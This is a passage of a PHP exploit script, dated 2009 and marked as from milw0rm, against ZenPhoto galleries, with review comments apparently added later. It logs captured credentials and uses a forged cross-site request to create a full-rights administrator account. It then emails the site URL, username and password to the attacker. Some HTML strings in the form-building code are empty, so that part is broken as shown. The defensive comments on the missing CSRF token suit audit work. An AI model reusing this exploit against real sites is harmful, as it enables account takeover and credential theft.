$value) fwrite($file, "$key = $value\r\n"); // presumably the tail of a loop whose header lies above this excerpt: writes one "key = value" line per pair
    fwrite($file,"\r\n"); // blank line after the pairs just written
    fclose($file);
    // Tells $email that something was written to the log; the leading @ suppresses mail() error output.
    @mail($email, "ZenPhoto Double Penetration Exploit got a password!", "Please check your log file :)");
    redirect(); // send the visitor back to the admin page
}
else // otherwise try to create a new admin account using CSRF
{
    // Form fields for the forged request. Account slot 0 gets the supplied
    // $user/$pass and every *_rights flag set to "1".
    // NOTE(review): the field list holds no anti-CSRF token or nonce, so this only
    // succeeds against a server that accepts the save request on the strength of
    // the admin's session cookie alone. Requiring a per-session token on this
    // endpoint defeats it; confirm the deployed ZenPhoto release enforces one.
    // NOTE(review): the literal admin name and e-mail values below are usable as
    // indicators when auditing the administrator list of a gallery.
    $inputs = array(
        "saveadminoptions" => "true",
        "totaladmins" => "1",
        "alter_enabled" => "1",
        "0-adminuser" => $user,
        "0-confirmed" => "2",
        "0-adminpass" => $pass,
        "0-adminpass_2" => $pass,
        "0-admin_rights" => "1",
        "0-options_rights" => "1",
        "0-zenpage_rights" => "1",
        "0-tags_rights" => "1",
        "0-themes_rights" => "1",
        "0-all_album_rights" => "1",
        "0-edit_rights" => "1",
        "0-comment_rights" => "1",
        "0-upload_rights" => "1",
        "0-view_rights" => "1",
        "0-main_rights" => "1",
        "0-admin_name" => "Owned by dusecurity.com",
        "0-admin_email" => 'petros was here <3'
    );
    // Request target: the options-saving action of the admin panel under $site.
    $action = $site."/zp-core/admin-options.php?action=saveoptions";
    // NOTE(review): the echoed strings here and in the loop below are empty in this
    // copy of the file; whatever markup they carried appears to have been
    // stripped when the page was extracted.
    echo "";
    echo "
";
    foreach($inputs as $key => $value) { echo ""; } // one echo per field in $inputs
    echo ''; // not that they have a choice lol
    echo "
";
    // Report the result to $email, because the admin will probably notice he can't log in.
    // The message body carries the admin URL, username and password in clear text.
    @mail($email,"ZenPhoto Double Penetration Exploit Success!", "Site: $site/zp-core/admin.php\nUsername: $user\nPassword: $pass");
}

/**
 * Send the browser to the gallery's admin page and end the script.
 *
 * Emits a Location header built from $site and the path /zp-core/admin.php,
 * then calls exit, so nothing after the call site runs. Called above once the
 * log file has been written and the notification mail sent.
 *
 * @return void Does not return; exit ends the script.
 */
function redirect(){
    header("Location: $site/zp-core/admin.php");exit;
}
?> # milw0rm.com [2009-07-16]